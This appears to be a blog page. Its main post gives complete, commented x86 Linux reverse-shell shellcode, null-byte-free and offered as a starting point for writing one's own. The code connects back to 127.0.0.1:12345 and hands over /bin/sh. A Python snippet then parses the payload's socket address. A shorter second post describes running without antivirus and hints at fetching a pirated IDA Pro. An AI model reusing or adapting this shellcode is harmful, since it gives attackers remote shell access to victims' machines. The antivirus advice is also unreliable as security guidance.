x86 reverse shellcode documented example

Writing shellcode is hard, documented references are scarce, and figuring out how to translate function calls into assembly is a pain. I'm posting here a shellcode I wrote a while back. It's not a perfect example; it could be shorter and more elegant, but it works and does not contain null bytes. It should get you started if you need help writing your own variety of shellcode.

This is a reverse shellcode: it will connect back to 127.0.0.1 on port 12345, hoping to find a listening server, and provide a shell.

# x86 linux reverse shellcode example
# aviran.org

xor eax, eax        # zero eax, ebx, edx
xor ebx, ebx
xor edx, edx

push 0x6            # push 6, 1, 2 onto the stack:
push 0x1            # the argument array for
push 0x2            # socket(AF_INET=2, SOCK_STREAM=1, IPPROTO_TCP=6)
mov ecx, esp        # ecx = pointer to the argument array
mov bl, 1           # ebx = 1 = SYS_SOCKET (socketcall subcall)
mov al, 0x66        # eax = 0x66 = socketcall syscall
int 0x80            # call socket()
mov esi, eax        # esi = returned sockfd
xor ebx, ebx        # ebx = 0
xor ecx, ecx        # ecx = 0
xor edx, edx        # edx = 0
mov al, 0x66        # eax = 0x66 = socketcall again

push ebx            # padding: sin_zero[8] (two zero dwords)
push ebx
mov bl, 0x3         # ebx = 3 = SYS_CONNECT

mov dl,0x1          # build sockaddr_in on the stack; a word cannot be
shl edx,24          # pushed, so port and AF_INET go into one dword
mov dl,0x7f         # edx = 0x0100007f = sin_addr 127.0.0.1 (network order)
push edx
xor edx,edx         # edx = 0x39300002: sin_port 0x3930 (12345 in network
mov dx,0x3930       # order) in the high word, sin_family AF_INET = 2 in the
shl edx,16          # low word; built in a register because pushing it as an
mov dl,0x2          # immediate would put null bytes into the shellcode
push edx

mov ecx, esp        # ecx = pointer to the sockaddr_in struct
                    # args for connect(sockfd, &addr, sizeof(addr))
push 0x10           # 0x10 = 16 = sizeof(struct sockaddr_in)
push ecx            # pointer to struct
push esi            # sockfd
mov ecx, esp        # ecx = pointer to the argument array
int 0x80            # call connect()

xor eax, eax
xor ebx,ebx
xor ecx,ecx
mov ebx,esi         # ebx = sockfd
mov al,0x3f         # eax = 0x3f = dup2
mov cl, 0x2         # ecx = 2 = stderr
int 0x80            # call dup2(sockfd, 2)

xor eax, eax
mov al,0x3f
dec cl              # cl = 1 = stdout
int 0x80            # call dup2(sockfd, 1)

xor eax, eax
mov al,0x3f
dec cl              # cl = 0 = stdin
int 0x80            # call dup2(sockfd, 0)

xor eax,eax         # zero eax, ecx, edx
xor ecx,ecx
xor edx,edx

mov al,11           # eax = 11 = execve
push edx            # push 0: terminator of the string
push 0x68732f6e     # "n/sh" (pushed in reverse order, forming "//bin/sh")
push 0x69622f2f     # "//bi"
mov ebx, esp        # ebx = pointer to "//bin/sh" (filename)
push edx            # push NULL
mov edx,esp         # edx = pointer to NULL = envp (third argument)
push ebx            # push pointer to the filename
mov ecx,esp         # ecx = argv = {"//bin/sh", NULL} (second argument)
int 0x80            # execve("//bin/sh", argv, envp)
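To check the byte layout the comments above describe, here is an added Python snippet that is not part of the original post: it rebuilds the 16 bytes the pushes leave on the stack, parses them as struct sockaddr_in the way an analyst does when recovering the callback endpoint from a captured shellcode, and reports which bytes of the two immediates are zero (the reason they are assembled in edx instead of being pushed directly). The constants are the ones from the shellcode above.

```python
import socket
import struct

# The four dwords the shellcode above leaves on the stack for connect(),
# in push order: two zero dwords (push ebx, i.e. sin_zero), then 0x0100007f
# built in edx (sin_addr), then 0x39300002 built in edx (sin_port, sin_family).
PUSHED_DWORDS = [0x00000000, 0x00000000, 0x0100007F, 0x39300002]


def stack_image(dwords_in_push_order):
    """Bytes as they lie in memory after the pushes.

    The stack grows downward, so the last dword pushed sits at the lowest
    address (where esp points) and is therefore first in the struct; each
    dword is stored little-endian.
    """
    return b"".join(struct.pack("<I", d) for d in reversed(dwords_in_push_order))


def parse_sockaddr_in(buf):
    """Parse a 16-byte struct sockaddr_in as the kernel reads it on x86:
    sin_family in host (little-endian) order, sin_port and sin_addr in
    network (big-endian) order, then 8 bytes of sin_zero."""
    if len(buf) != 16:
        raise ValueError("struct sockaddr_in is 16 bytes, got %d" % len(buf))
    family = struct.unpack("<H", buf[0:2])[0]
    port = struct.unpack("!H", buf[2:4])[0]
    ip = socket.inet_ntoa(buf[4:8])
    return {"family": family, "port": port, "ip": ip,
            "sin_zero_ok": buf[8:16] == bytes(8)}


def null_byte_positions(dword):
    """Indices (0 = least significant, i.e. first byte in memory) of the zero
    bytes in a dword. `push imm32` encodes the immediate verbatim, so each such
    byte would be a null in the shellcode; that is why 0x0100007f and
    0x39300002 are built in edx rather than pushed as immediates."""
    return [i for i in range(4) if (dword >> (8 * i)) & 0xFF == 0]


if __name__ == "__main__":
    addr = parse_sockaddr_in(stack_image(PUSHED_DWORDS))
    print(addr)  # family 2 (AF_INET), port 12345, ip 127.0.0.1
    for d in PUSHED_DWORDS[2:]:
        print("0x%08x has null bytes at %s" % (d, null_byte_positions(d)))
```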

Life without an Anti Virus

If you have a virus or a trojan running around on your machine, it is most likely that you yourself are the source of the infection. Only on very rare occasions can a hostile program infiltrate your operating system all on its own, meaning that if you got infected you took an active part somewhere in the process of the infection. It may have been that USB flash drive you got from a friend and connected to your machine, maybe you downloaded some pirated software that packed some unwanted additions, or maybe it was that adult website that asked for your permission to install some add-on that would allow you to watch some of its videos.

After realizing this a while ago, about when Windows 95 was still around, I decided to stop using anti-virus software on a regular basis, because it takes a lot of computer resources, thus slowing down the machine. I do install an anti-virus program once a year or so and scan my machine to make sure nothing got by me; I prefer to use Avast anti-virus, which doesn't embed itself into Windows and offers a pre-boot scan.

I'm usually not too concerned about viruses/worms/etc., but every once in a while a computer security guy needs to download and install some shady program from some shady website. Which led me to write this post, postponing my decision on whether or not to download a 100% clean, virus-free copy of IDA Pro 6.